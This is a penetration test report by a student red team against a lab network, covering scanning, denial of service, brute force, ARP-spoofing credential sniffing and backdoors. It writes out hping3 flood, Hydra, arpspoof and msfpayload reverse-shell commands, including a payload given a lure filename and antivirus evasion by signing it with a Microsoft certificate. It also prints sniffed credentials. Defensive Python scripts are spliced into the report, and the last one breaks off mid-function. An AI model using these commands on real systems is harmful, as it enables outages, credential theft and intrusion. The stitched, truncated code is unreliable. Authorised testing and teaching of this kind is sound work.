
Ethical Hacking & Penetration Test

RED TEAM 2

Ahmet Shkoza
Erion Sina
Fabiola Xhelili
Fjoralba Shehaj
Gerhard Arifi
Igli Shkreta
Matilda Hala
Romina Marqeshi

28 March 2019
1 Contents

1 Contents
2 Table of Figures
3 Executive Summary
4 Introduction
5 Scope
6 Scanning
6.1 Nmap
6.2 TCP Scan
6.3 SYN Scan
6.4 Sparta
6.5 Nessus
6.6 Acunetix
7 Attack Phase
7.1 DDoS
7.1.1 TCP SYN Flood
7.1.2 GoldenEye
7.2 Brute Force Attack
7.3 Man in the Middle Attack
7.3.1 Sniffing FTP Packets with Dsniff - ARP Spoofing MITM Attack
7.3.2 Sniffing with Cain & Abel
8 FTP Server Fuzzing
9 Backdoor
9.1 Backdoor Created Using Metasploit
9.2 Create FUD Backdoor to Bypass Antivirus
10 SNMP Sniff
11 Social Engineering
11.1 Creation of a Zip Bomb and Sending It by Mail
11.2 Sending Malicious Files
12 Remote Desktop Protocol (RDP) Scan and Attack
13 Hacking Wi-Fi
14 Hacking the Jump Machine
15 Summary

2 Table of Figures

Figure 1. Network scanning using nmap
Figure 2. Port scanning using nmap
Figure 3. Port scanning using Metasploit
Figure 4. TCP scanning using Metasploit
Figure 5. SYN scanning using Metasploit
Figure 6. SPARTA scan: in the Hosts field, the IP address of the target is defined on the left and the results are shown on the right
Figure 7. Nessus scanner results
Figure 8. Executive summary from Acunetix scanner
Figure 9. hping3 attack
Figure 10. Denial of Service was successful!
Figure 11. Dictionary attack with Sparta
Figure 12. Port 3333 sent to brute
Figure 24. Use of Dsniff
Figure 25. Login and password sniffing
Figure 13. Opened Cain and Abel tool
Figure 14. Packet listening
Figure 15. Selection of network adapter
Figure 16. Turn on the network adapter
Figure 17. Network scanning
Figure 18. Selecting APR tab
Figure 19. Packet listening to select the firewall IP
Figure 20. Poisoning for the firewall IP address
Figure 21. Sniffing results
Figure 22. Certificates of the visited websites
Figure 23. Detailed information of the certificates
Figure 26. FTP server fuzzing
Figure 27. Infected file
Figure 28. Meterpreter selection
Figure 29. Sign the executable with Microsoft certificate
Figure 30. Check hash on Virustotal.com
Figure 31. Check file on Virustotal.com
Figure 32. Backdoor session created successfully
Figure 33. Make the backdoor persistent
Figure 34. SNMP sniff
Figure 35. Sending zip bomb
Figure 36. Creation of malicious file
Figure 37. Reverse TCP
Figure 38. Sending file with email
Figure 39. RDP scan
Figure 40. Attacking RDP
Figure 41. Wireless adapter Ethernet dual antenna
Figure 42. Wireless traffic monitor
Figure 43. Target victim
Figure 44. Deauthentication
Figure 45. Sniffing from wireless traffic of the AP
Figure 46. Crack the password
Figure 47. Copying SAM and System files
Figure 48. Extract NTLM hashes
Figure 49. Decrypt hashes
Figure 50. Logging in with local account
Figure 51. psexec command
Figure 52. Victim machine - cmd
Figure 53. Enabling RDP
Figure 54. Disable firewall
Figure 55. Hiding the folder
Figure 56. Exclude keylogger folder
Figure 57. Installing keylogger
Figure 58. Testing keylogger
Figure 59. Checking the shared folder
Figure 60. Checking the log file
Figure 61. Finding user and password
Figure 62. Ticket system
Figure 63. Login to Windows machine
Figure 64. Finding the IP of DNS
Figure 65. Login to the Windows machine
Figure 66. List of BT2 users
Figure 67. Exploring the virtual infrastructure
Figure 68. Ubuntu machine (left open)
Figure 69. Exploring the firewall
Figure 70. No NAT configured for VPN peer

3 Executive Summary

RED TEAM 2 was engaged to conduct a focused External Network Penetration Test on a
defined set of services in the network of BLUE TEAM 2. The purpose of this
engagement was to identify and prioritize the security vulnerabilities on the identified systems.
The engagement was launched on 01.03.2019 and included 27 days of planning, testing,
analysis and documentation.
The following security issues were identified during the course of the Network Penetration Test:

- No external VPN was found
- DDoS vulnerability
- FTP exploitation
- Wi-Fi hacking

The following suggestions are recommended to mitigate the findings:

- A VPN should be used
- Prevention of DDoS:
  - Limiting the rate of requests
  - Limiting the number of (simultaneous) connections
  - Closing slow connections
  - Using caching to smooth traffic spikes
- FTP should use an encrypted channel
- The Wi-Fi password should meet the complexity policies

4 Introduction

The penetration test project conducted by RED TEAM 2 followed all the stages of a
standard external penetration test: Planning, Gathering Information, Discovering Vulnerabilities
and Reporting.
The team was gathered on 1 March in a kick-off meeting where planning and the scope and goals
of the project were discussed. Furthermore, the team leader was selected, who would be in charge
of controlling all the phases of the project and giving support to all the members.
Team leader: Ahmet Shkoza
Table 1 – Kick off meeting

Action Item | Assigned To | Due Date
1. Gathering Information | Red Team 2 | 11/03/2019
2. Deliverables | Red Team 2 |
   - Progress Report | | 12/03/2019
   - Executive Summary, Vulnerability Summary, Detailed test results with countermeasures to safeguard against vulnerabilities, Recommendation | | 27/03/2019
3. Scanning | Matilda Hala, Fjoralba Shehaj | 26/03/2019
4. Results Analyzing | Red Team 2 | 26/03/2019
5. DDoS | Romina Marqeshi, Erion Sina | 11/03/2019
6. Brute Force Attack / Dictionary Attack | Fabiola Xhelili, Fjoralba Shehaj | 22/03/2019
7. WiFi Hacking | Ahmet Shkoza | 23/03/2019
8. SNMP Sniff | Fabiola Xhelili | 23/03/2019
8. Man In the Middle Attack | Gerhard Arifi, Ahmet Shkoza | 22/03/2019
9. Backdoor | Gerhard Arifi, Erion Sina | 25/03/2019
10. RDP Scan and Attack | Erion Sina | 25/03/2019
11. Social Engineering | Fjoralba Shehaj | 26/03/2019
12. Hacking the Jump Machine | Igli Shkreta | 26/03/2019
13. Report Documentation | Red Team 2 | 27/03/2019
5 Scope
The scope of the project is to discover the infrastructure of BLUE TEAM 2 and to attack it in
order to gain access to their services. The project will evaluate the security weaknesses of BLUE
TEAM 2’s network systems, identify the gaps in the system’s security and prepare
penetration test recommendations to reduce the threat.
All activities were conducted in a manner that simulated a malicious actor engaged in a targeted
attack against Blue Team 2 with the goals of:
- Identifying whether a remote attacker could penetrate the Blue Team 2 infrastructure.
- Determining the impact of a security breach on the confidentiality of the infrastructure.
- Determining the impact of a security breach on the availability of Blue Team 2
information systems.
Efforts were placed on the identification and exploitation of security weaknesses that could allow
a remote attacker to gain unauthorized access to organizational data. The attacks were conducted
with the level of access that a general Internet user would have. All tests and actions were
conducted under controlled conditions.
RED TEAM 2 will use Kali Linux’s tools to perform the attacks.
The tools that will be used are:

1. Nmap (“Network Mapper”)
2. Nessus
3. Sparta
4. Acunetix
5. Hping3
6. Hydra
7. Dsniff
8. Metasploit
9. PsTools
10. Mimikatz
11. Hiren's BootCD PE
12. Windows Spy Keylogger

Security Assessment Characteristics and Requirements

External Network Penetration Assessment – Network-oriented

Gain access to the:
- File Server
- Web Server
- Mail Server
- Wi-Fi AP
6 Scanning

In the pre-scanning phase, the services offered by Blue Team 2 were already
specified. To get a deeper insight, different tools are used for scanning, in order to get as much
information as possible to penetrate the system. For the purposes of this assessment, our team
was provided with the only information that can be used for scanning, which is the WAN interface IP
address (the public IP address of the firewall, which is the gateway to the whole system).
Operating systems used: Kali Linux, Windows
Tools used: nmap, Metasploit, Nessus, Sparta, Acunetix
On the first day all the ports appeared filtered. The next day we continued to scan and found
that port 21 was open. The result was helpful to understand that Blue Team 2 had an FTP
service which was unencrypted. This finding was important for the next step of attacking the
FTP server.

6.1 Nmap

Figure 1. Network scanning using nmap

Figure 2. Port scanning using nmap

6.2 TCP Scan

Before performing any scans we should start Metasploit by typing msfconsole.

Scanners are a type of auxiliary module in Metasploit, and to locate the port scanners, we
can type search portscan at the prompt.
This gives us several results, including the types of port scans we will be using. Type use
auxiliary/scanner/portscan/tcp to load the module.

Figure 3. Port scanning using Metasploit

The number of threads can also be increased to help the scan run faster. To be safe, we can set
this to something like 8. Now we're ready to start the scan. In Metasploit, the run command is
simply an alias for exploit, so it will do the exact same thing. Given we are only conducting
scans, run seems more appropriate, though it really doesn't matter.

Figure 4. TCP scanning using Metasploit

6.3 SYN Scan

Next, we'll move on to a SYN scan.

When performing a number of scans or exploits on a single target, it can get tiring setting the
same options over and over again. Luckily, there is a command that will set an option globally,
meaning it won't have to be re-entered when using a different module. Use setg to set a global
option.
Now, type run to start the scan.

Figure 5. SYN scanning using Metasploit

6.4 Sparta

Sparta also has nmap integrated, so the results from both tools are almost the
same, but Sparta runs more tools, like Nikto and Hydra, and is a GUI application.

Figure 6. SPARTA scan: in the Hosts field, the IP address of the target is defined on the left and the
results are shown on the right

Results of Sparta:
- FTP server is FileZilla ftpd: port 21 is unencrypted while port 990 is encrypted
- Web server is Apache; the framework used for the web is Laravel
- Firewall is based on an Nginx server
- Ticketing system – a portable version of OpenSSH, a free implementation of the Secure
Shell protocol, on Ubuntu Linux

6.5 Nessus

Nessus is used to get a more detailed report that we could use to find breaches on the target
system. It identifies vulnerabilities, like software flaws, missing patches, malware, and
misconfigurations across the target operating systems and applications.
Figure 2 shows the detailed report which lists the vulnerabilities and their level of severity.
Result of Nessus:

Of the 36 vulnerabilities found in total:

4 of them had a medium level of severity – all of them related to the SSL certificate of the
server:
They show that the certificate may contain a signature that did not match the certificate
information, or that the certificate may be unrecognized, signed with a weak hash algorithm or
with medium-strength encryption.
Suggested solution: generating a proper certificate for the web service or reconfiguring it to
avoid the weak hashing and encryption algorithms.
One of them had a low level of severity: it shows that the remote service uses the RC4 cipher,
which has low randomness and makes it easier for an attacker to decrypt the obtained
information.
Suggested solution: avoiding RC4 ciphers and using TLS 1.2.
The rest of the shown vulnerabilities are only informational, regarding the hardware, OS and
servers used, so they cannot be directly exploited.

Figure 7. Nessus scanner results

6.6 Acunetix
To have a better view of the web server and framework, the Acunetix scanner was used. Acunetix
tests for SQL Injection, XSS, XXE, SSRF, Host Header Injection and other web vulnerabilities.
The scan was made several times and the results were the same:

- 4 medium alerts related to Directory Listing and TLS

Directory listing makes it easier to identify the resources at a given path, exposing sensitive
files; it does not necessarily create a security vulnerability by itself, provided that the resources
cannot be accessed by unauthorized parties.
Suggested solution: correctly configuring the web server for the paths beneath the web root.

TLS 1.0 is not considered strong, so TLS 1.1 or higher is recommended.

- 6 alerts of low-level severity

Alerts related to cookies indicate that the cookie can be accessed over insecure channels.

Suggested solution: the HttpOnly and Secure flags should be set.

Other alerts are still of low severity and were already found by the Nessus scanner.

What makes this application interesting is that it is more web-oriented and can give hints of
problems related to the web service.

Figure 8. Executive summary from Acunetix scanner

The framework used is Laravel, which comes out of the box with already implemented security
features. Hence, most of the vulnerabilities detected by Acunetix have a very low likelihood
and severity. In this aspect, those vulnerabilities are difficult to exploit.
The scanning phase continued every day to check for changes.

7 Attack Phase

7.1 DDoS
A distributed denial of service (DDoS) attack is an attempt to make a service unavailable. Unlike
other kinds of attacks, which establish a foothold or hijack data, DDoS attacks do not threaten
sensitive information. It is just an attempt to make a service unavailable to legitimate users. In
our scenario, we used DDoS for taking down the web application firewall.
Network and Transport Layer Attacks

These types of attacks focus on targeting the transport and network layers.
They usually consist of volumetric attacks that aim to overwhelm the target
machine with malicious traffic, consuming all resources and making the server unresponsive.

7.1.1 TCP SYN Flood
The aim of a SYN flood is sending lots of SYN packets to the server and ignoring the SYN+ACK
packets returned by the server.
If an attacker sends enough SYN packets, this will overwhelm the server because servers are
limited in the number of concurrent TCP connections. If the server reaches its limit, it cannot
establish new TCP connections until the existing connections which are in the SYN-RCVD
state time out.
In order to perform SYN flood attacks we have used hping3.
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de
facto tools for security auditing and testing of firewalls and networks, and was used to exploit the
Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of
hping, hping3, is scriptable using the Tcl language and implements an engine for string-based,
human-readable description of TCP/IP packets, so that the programmer can write scripts related
to low-level TCP/IP packet manipulation and analysis in a very short time.
root@kali:~# hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping is a command-line oriented TCP/IP packet assembler/analyzer. It supports TCP, UDP,
ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered
channel, and many other features.

In our case it was used in traceroute mode and in verbose ICMP mode, and it could
successfully shut down the firewall, making its public IP unreachable.

Figure 9. hping3 attack

Also we tried Advanced SYN flood with random source IP, different data size, and window size:

root@kali:~# hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE
--flood: send packets as fast as possible
--rand-source: random source address
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: window size (default 64)
-p --destport: destination port (default 0)
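From the defending side, the SYN flood described above shows up as connections stuck in SYN-RCVD. The script below is an added example, not part of the original report: it replays a constructed packet trace (the firewall IP from the report with made-up sources from a documentation range), keeps the half-open table the way the server's backlog would, and flags a listening socket once the count passes a threshold; the distinct-source count separates the --rand-source variant from a single noisy host. The 10-second SYN-RCVD timeout and the threshold of 20 are assumed values.

```python
from collections import defaultdict
from dataclasses import dataclass

# Half-open (SYN-RCVD) connection monitor. Constructed example: the packet
# records below are made up; they are not captures from the engagement.


@dataclass(frozen=True)
class Packet:
    ts: float      # capture time in seconds
    src: str
    dst: str
    sport: int
    dport: int
    flags: str     # TCP flags as letters: "S" SYN, "SA" SYN+ACK, "A" ACK, "R" RST


def half_open_state(packets, stale_after=10.0):
    """Replay packets and return the client-side 4-tuples still in SYN-RCVD.

    A SYN from a client opens an entry; the client's ACK (third handshake
    step) or a RST from either side closes it. Entries older than
    stale_after seconds (the server's SYN-RCVD timeout, an assumed value)
    are dropped, mirroring what the server itself would reclaim.
    """
    pending = {}
    last_ts = 0.0
    for p in packets:
        last_ts = p.ts
        key = (p.src, p.sport, p.dst, p.dport)
        reverse = (p.dst, p.dport, p.src, p.sport)
        if p.flags == "S":
            pending[key] = p.ts
        elif p.flags == "A":
            pending.pop(key, None)
        elif "R" in p.flags:
            pending.pop(key, None)
            pending.pop(reverse, None)
        # "SA" is the server's reply and changes nothing on the client side
    return {k: ts for k, ts in pending.items() if last_ts - ts <= stale_after}


def flood_verdict(pending, threshold=20):
    """Group half-open entries by listening socket and flag floods.

    Counting per source would miss a --rand-source flood (every source shows
    one connection), so the count is per (dst, dport); the number of
    distinct sources is reported to tell spoofed floods from a single host.
    """
    by_socket = defaultdict(list)
    for (src, _sport, dst, dport), _ts in pending.items():
        by_socket[(dst, dport)].append(src)
    verdict = {}
    for sock, sources in by_socket.items():
        count = len(sources)
        if count >= threshold:
            distinct = len(set(sources))
            verdict[sock] = {
                "half_open": count,
                "distinct_sources": distinct,
                # heuristic: one half-open entry per source suggests spoofing
                "likely_spoofed": distinct == count,
            }
    return verdict


def build_sample():
    """Constructed traffic: one legitimate handshake, then 30 unanswered SYNs."""
    gw = "10.100.200.34"  # firewall public IP from the report
    pkts = [
        Packet(0.00, "10.100.200.134", gw, 50000, 443, "S"),
        Packet(0.01, gw, "10.100.200.134", 443, 50000, "SA"),
        Packet(0.02, "10.100.200.134", gw, 50000, 443, "A"),
    ]
    for i in range(30):
        src = f"198.51.100.{i + 1}"   # documentation range, stands in for random sources
        t = 1.0 + i * 0.001
        pkts.append(Packet(t, src, gw, 40000 + i, 443, "S"))
        pkts.append(Packet(t + 0.0005, gw, src, 443, 40000 + i, "SA"))  # answered, never ACKed
    return pkts


if __name__ == "__main__":
    state = half_open_state(build_sample())
    for sock, info in flood_verdict(state).items():
        print(f"{sock[0]}:{sock[1]} half-open={info['half_open']} "
              f"sources={info['distinct_sources']} spoofed={info['likely_spoofed']}")
```

On a Linux host the usual mitigation is enabling SYN cookies (net.ipv4.tcp_syncookies=1), so that half-open entries are not held in the backlog at all.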

7.1.2 GoldenEye
GoldenEye is an HTTP denial of service tool written in Python. It uses KeepAlive paired with Cache-
Control options to persist socket connections, busting through caching (when possible) until it
consumes all available sockets on an HTTP/S server.
GoldenEye changes the generated requests dynamically: it randomizes user agents, referrers and
almost all of the various parameters used.
Our attack parameters:
Number of workers: 10
Connections/worker: 500
NoSSLcheck: True (as their firewall has a self-signed SSL certificate)
Method: GET

Figure 10. Denial of Service was successful!

7.2 Brute Force Attack

Our team made a great effort to carry out a brute force attack, but unfortunately it was
unsuccessful. The tool used for cracking the password was Hydra, as it is the best
password cracking tool. As shown in the figure below, the passwords were all encrypted
very well and we could not crack any.
For brute forcing, Hydra needs a list of passwords. There are lots of password lists available. The
password list is pre-installed on Kali Linux and can be found at the following
location:
/root/Desktop/bruteforce-database-master/word.lst
The command used in Kali Linux was:
# hydra -l admin -P /root/Desktop/bruteforce-database-master/word.lst -e ns -m https:
10.100.200.34:3333 -vV 10.100.200.34 http-get
The option "-l" tells the username or login to use.
Next comes the capital "-P" option which provides the word list to use. Hydra will pick up each
line as a single password and use it.
The option "-e ns" is used to try "n" null password and "s" login as pass.
The option "-m" provides the list of servers to be attacked in parallel, one entry per line.
The "-v" option is for verbose and the capital "-V" option is for showing every password being
tried. Last comes the host/IP address followed by the service to crack.

Figure 11. Brute force with Hydra

Another step was trying to crack the username and password, done from the Sparta application. The
files used for this attack were txt files containing guessed words for the passwords.
Target IP: public IP of the firewall
Target port: 3333
Command used: Send to brute
Service: https-post
Username known: admin or Dekra
Password guessed: dictionary txt files

Figure 12. Dictionary attack with Sparta

However, the result was unsuccessful!
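Both the Hydra and the Sparta attempts above would be visible to Blue Team 2 as a burst of 401 responses in the firewall's web-server access log. The script below is an added example, not from the report or from the tools it names: it parses constructed nginx/Apache combined-format log lines and counts authentication failures in a sliding window per source IP and per target account, so a run with a fixed login such as admin is caught even when the requests arrive from several addresses. The threshold, window and timestamps are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Brute-force detector over web-server access logs in the nginx/Apache
# "combined" format. Constructed example: the log lines below are made up.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) '
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return ip, user, time and status from one combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],   # "-" when no Authorization header was sent
        "time": datetime.strptime(m["time"], TIME_FMT),
        "status": int(m["status"]),
    }


def max_in_window(times, window):
    """Largest number of events that fall inside any interval of length window."""
    times = sorted(times)
    best, lo = 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def detect_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag sources and target accounts with >= threshold auth failures per window.

    Failures are 401/403 responses. Counting per target user as well as per
    source IP matters: a tool run with a fixed login (hydra -l admin ...) keeps
    hitting the same account even when the requests come from several IPs.
    """
    by_ip, by_user = defaultdict(list), defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["status"] not in (401, 403):
            continue
        by_ip[ev["ip"]].append(ev["time"])
        if ev["user"] != "-":
            by_user[ev["user"]].append(ev["time"])

    def flagged(groups):
        hits = {}
        for key, times in groups.items():
            n = max_in_window(times, window)
            if n >= threshold:
                hits[key] = n
        return hits

    return {"ips": flagged(by_ip), "users": flagged(by_user)}


def build_sample_log():
    """Constructed log: 6 failures each from two IPs against 'admin' inside one minute."""
    lines = ['10.100.200.134 - - [22/Mar/2019:14:02:10 +0100] "GET /status HTTP/1.1" 200 512 "-" "curl/7.64.0"']
    for ip, offset in (("10.100.200.62", 1), ("203.0.113.7", 30)):
        for i in range(6):
            stamp = f"22/Mar/2019:14:03:{offset + i:02d} +0100"
            lines.append(f'{ip} - admin [{stamp}] "GET / HTTP/1.1" 401 188 "-" "Mozilla/4.0 (Hydra)"')
    return lines


if __name__ == "__main__":
    print(detect_bruteforce(build_sample_log()))
```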

7.3 Man in the Middle Attack

7.3.1 Sniffing FTP packets with Dsniff - ARP spoofing MITM attack
A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly
alters the communication between two parties who believe they are directly communicating with
each other.

Scenario:

- Victim’s machine – Windows machine (10.100.200.134)
- Attacker’s machine – Kali Linux (10.100.200.62)
- Router’s IP address (external FW IP address) – Gateway (10.100.200.34)

The first step is to configure our attacking machine to enable packet forwarding. This will allow
our attacking machine to mimic the router, tricking the victim machine into thinking it is
connecting to the router when it is really connecting to the attacking machine.

For packet forwarding, open a new terminal and type
“echo 1 > /proc/sys/net/ipv4/ip_forward“.
Our target IP address will be:
Now the next step is to set up arpspoof between the victim and the router. Arpspoof is a command-line
utility that allows us to intercept packets on a switched LAN. This is an extremely effective way
of sniffing traffic on a switch.

Syntax: arpspoof -i [Interface Name] -t [Victim’s IP] -r [Router’s IP]

So in our case,
-i = eth0
-t = 10.100.200.134
-r = 10.100.200.34
So the final command will be:
Command: arpspoof -i eth0 -t 10.100.200.134 -r 10.100.200.34
To use Dsniff, we proceed with: “dsniff -i eth0“.
Figure 13. using of Dsniff

Figure 14. Login and Password sniffing

In the above screenshot, we successfully sniffed the login and password information of the FTP
protocol.

Recommendation:
1- Disk quotas
2- Access by IP

7.3.2 Sniffing with Cain & Abel

Step 1:
First we turned off the Windows firewall or any other third-party firewall, so that all the packets
are captured efficiently.

Step 2:
Open Cain and Abel tool

Figure 15. Opened Cain and Abel tool

Step 3:

Then we switched to Sniffer Tab and clicked Configure in the main menu to configure our
packet listening adapter.

Figure 16. Packet Listening

Step 4:
Selected the appropriate network adapter for our network that we wanted to sniff the packets for
plain-text passwords. Click Ok.

Figure 17. Selection of network adapter

Step 5:
The Green Adapter must be clicked to turn on the network adapter that we just configured.

Figure 18. Turn on the Network adapter

Step 6:

By scanning the network we populated the table with all the PCs on our LAN.

Figure 19. Network scanning

Step 7:
Now select the APR tab below as shown and first click on the upper right pane area.
When we click that area the blue plus (“+”) icon will be enabled. Let’s press that blue plus (“+”)
icon.

Figure 20. Selecting APR tab

Step 8:

Now we need to select the firewall's IP address and click OK. This means that we want to listen
to every packet that is sent to the firewall. If we select any other IP address in our LAN, then
we can listen to only that particular host on the network. Since the router responds to all the
requests of the hosts connected to the LAN, we can listen to all the hosts. Now we click the
yellow circle icon as shown. This means that we are starting ARP poisoning.

Figure 21. Packet Listening to select the Firewall IP

On the picture below we can see the full poisoning for the firewall IP address

Figure 22. Poisoning for the firewall IP address

Step 9:

We can now see the results of our sniffer in the Passwords tab at the bottom. We can see that we
are getting passwords of HTTP, i.e. plain-text sessions, in our LAN.

33
Figure 23. Sniffing results

On APR tab we get the certificates for the visited websites

34
Figure 24. Certificates of the visited websites

By right-click on a specific certificate file we can get valuable information about different
subjects of that certificate, as shown is the picture below.

35
Figure 25. Detailed information of the certificates
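The poisoning in steps 7-9 works because every host trusts the latest ARP reply it hears. From the defender's side the same traffic is easy to flag: a pinned gateway answered by a second MAC, an IP that changes MAC mid-capture, and one MAC answering for the gateway and for hosts at once. The Python below is an added example (not from the report and not part of Cain & Abel) of such a passive detector; the ARP replies, addresses and the static gateway entry it uses are constructed placeholders, and in practice the input would come from a capture or from the switch's ARP table.

```python
"""Passive ARP-poisoning detector (added example; constructed sample data)."""
from collections import defaultdict

# Constructed stream of observed ARP replies as (sender_ip, sender_mac).
# 10.0.0.1 plays the firewall/gateway; midway a second MAC starts claiming it
# and the same MAC also claims a host, which is what full poisoning looks like.
SAMPLE_ARP_REPLIES = [
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"),   # gateway, legitimate
    ("10.0.0.20", "bb:bb:bb:bb:bb:20"),  # host, legitimate
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"),
    ("10.0.0.1", "cc:cc:cc:cc:cc:cc"),   # second MAC claims the gateway
    ("10.0.0.20", "cc:cc:cc:cc:cc:cc"),  # same MAC claims the host
    ("10.0.0.1", "cc:cc:cc:cc:cc:cc"),
]

# Constructed static ARP entry for the gateway (what a defender would pin).
TRUSTED_ENTRIES = {"10.0.0.1": "aa:aa:aa:aa:aa:01"}


def analyze_arp(replies, trusted=None):
    """Return a list of findings, in order of detection.

    Finding kinds:
      TRUSTED_MISMATCH         a pinned IP was claimed by a different MAC
      IP_MAC_CHANGE            an IP changed MAC during the capture
      MAC_CLAIMS_MULTIPLE_IPS  one MAC answered for several IPs (gateway + hosts)
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    findings = []
    for ip, mac in replies:
        mac = mac.lower()
        if ip in trusted and trusted[ip] != mac:
            findings.append(("TRUSTED_MISMATCH", ip, mac))
        if ip_to_macs[ip] and mac not in ip_to_macs[ip]:
            findings.append(("IP_MAC_CHANGE", ip, mac))
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
    for mac in sorted(mac_to_ips):
        ips = mac_to_ips[mac]
        if len(ips) > 1:
            findings.append(("MAC_CLAIMS_MULTIPLE_IPS", mac, tuple(sorted(ips))))
    return findings


def suspected_poisoners(findings):
    """MACs implicated by a trusted mismatch or by claiming several IPs."""
    return {f[1] if f[0] == "MAC_CLAIMS_MULTIPLE_IPS" else f[2]
            for f in findings if f[0] in ("TRUSTED_MISMATCH", "MAC_CLAIMS_MULTIPLE_IPS")}


if __name__ == "__main__":
    result = analyze_arp(SAMPLE_ARP_REPLIES, TRUSTED_ENTRIES)
    for finding in result:
        print(*finding)
    print("suspects:", suspected_poisoners(result))
```

The trusted-entry check is the one that fires first and with no false positives, which is why static ARP entries for the gateway (or dynamic ARP inspection on the switch) are the usual mitigation; the other two heuristics catch poisoning of hosts that were never pinned.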

Aside from finding the vulnerabilities of the first interface with Blue Team 2, which was
the firewall, the next step was testing the services the Blue Team had created.

8 FTP Server Fuzzing
FTP is a relatively simple protocol, but an FTP server may be vulnerable to buffer overflows
because of the high number of commands and their various parameters.

Tool used: Infigo FTPStress Fuzzer. It allows the user to define which FTP commands need to be
tested, and the length and type of data that will be sent to the target application.
Operating system: Windows

State of the FTP Server: in general, no traffic generated

Figure 26. FTP Server Fuzzing

9 Backdoor

9.1 Backdoor created using Metasploit
After finding the login credentials of the file server we could log in to their file server.
The login credentials were:

Username : dekra
Password: Bt22019
We tried to set up a backdoor by inserting into their file server a zip file that contained a .exe file
created with Metasploit.
The file was created with the following command:
root@Kali: /opt/metasploit-4.4.0/msf3# msfpayload windows/meterpreter/reverse_tcp lhost=10.100.200.x lport=4444 x > passwordet e juja te leshit.exe
After creating the file, we zipped it so that the payload would appear to be only some KB in size. The name
of the file was chosen to arouse the curiosity of Blue Team 2, so that they would open the zip. Had
they opened the zip, the payload could have made the server unreachable. Since
Blue Team 2 was aware of our attacks, this scenario never succeeded. Nevertheless, we
continued to have access to their FTP server without being noticed or stopped by them. This is
a critical finding because in a real scenario we could have had access to important documents and
files.

Figure 27. Infected File


9.2 Create FUD Backdoor to bypass antivirus

Used framework: Phantom-Evasion

Phantom-Evasion is an interactive antivirus evasion tool written in Python, capable of generating
(almost) FUD executables with the most common 32- and 64-bit msfvenom payloads.
Backdoor connection type(s): Reverse_HTTP

Format: Executable
Payload library: Msfvenom
Sign Executable: Microsoft Certificate (preventing the pop-up warning that alerts the user that the
executable is from an unknown source; instead it will be recognized as a Microsoft app)

Additional encoders: shikata_ga_nai & Countdown (lowering the detection rate)

Selecting the meterpreter type and generating the file

Figure 28. Meterpreter Selection

Sign the executable with a Microsoft certificate

Figure 29. Sign the executable with a Microsoft certificate

Check the file hash & the file on Virustotal.com

Figure 30. Check hash on Virustotal.com

Figure 31. Check file on Virustotal.com

Post-exploitation: Persistence + Privilege escalation

After the backdoor has been sent, a listener session is started within Metasploit to create a
remote handler in case the backdoor is executed by the Blue Team.

Backdoor session created successfully

Figure 32. Backdoor session created successfully

Now if we type “sysinfo” we get the information from the Windows 10 machine. If we need to
get a full shell session instead of using Metasploit’s own, we type “shell”.

Make the backdoor persistent

Figure 33. Make the backdoor persistent

Metasploit has a script named persistence that enables us to set up a persistent Meterpreter
(listener) on the victim's system. In our case the persistence step was not successful because of
the security restrictions.

10 SNMP Sniff

The Simple Network Management Protocol (SNMP) is the most basic method of gathering
bandwidth and network usage data. It can be used to monitor the bandwidth usage of routers and
switches port by port, as well as device readings like memory, CPU load etc.
By monitoring the SNMP traffic we could find the SNMP password. In our case SNMP was not
configured and version 1 was in use, which in itself presents a vulnerability because the
communication is unencrypted.
If our scenario had worked and SNMP had been configured, we could further have set up a network
monitor. By entering the found SNMP password, we could have discovered all their network devices
and gained control over them.

We used dsniff to monitor the SNMP traffic.

Figure 34. SNMP sniff
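The weakness the section relies on is that SNMPv1 (and v2c) send the community string, which is the only "password" there is, in cleartext in every packet, so anyone sniffing the segment learns it. The fix on the agent side is to stop serving v1/v2c and move to SNMPv3 with authentication and privacy (authPriv). The Python below is an added example (not from the report or from net-snmp) of a small audit over a net-snmp style `snmpd.conf`: it flags community-based directives, rates default communities as HIGH, and checks that SNMPv3 users are defined at the `priv` level. Both configuration texts are constructed samples, and the passphrases are placeholders.

```python
"""Audit a net-snmp snmpd.conf for SNMPv1/v2c exposure (added example; constructed configs)."""

# Constructed sample: the weak state described in the section (v1/v2c, cleartext community).
WEAK_SNMPD_CONF = """\
# constructed sample: SNMPv1/v2c with default and custom communities
rocommunity public
rwcommunity private 10.0.0.0/24
com2sec readonly default s3cr3t-community
sysLocation lab
"""

# Constructed sample: SNMPv3 only, authentication and encryption (authPriv).
# Passphrases are placeholders; net-snmp normally keeps createUser in its persistent config.
HARDENED_SNMPD_CONF = """\
# constructed sample: SNMPv3 only, authPriv
createUser monitor SHA "auth-pass-placeholder" AES "priv-pass-placeholder"
rouser monitor priv
sysLocation lab
"""

# Directives that grant access by community string (v1/v2c). com2sec carries the
# community in its 4th token, the *community directives in their 2nd.
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6", "com2sec"}
DEFAULT_COMMUNITIES = {"public", "private"}


def audit_snmpd_conf(text):
    """Return {'findings': [(line, severity, message), ...], 'v3_priv_users': n}."""
    findings = []
    v3_priv_users = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
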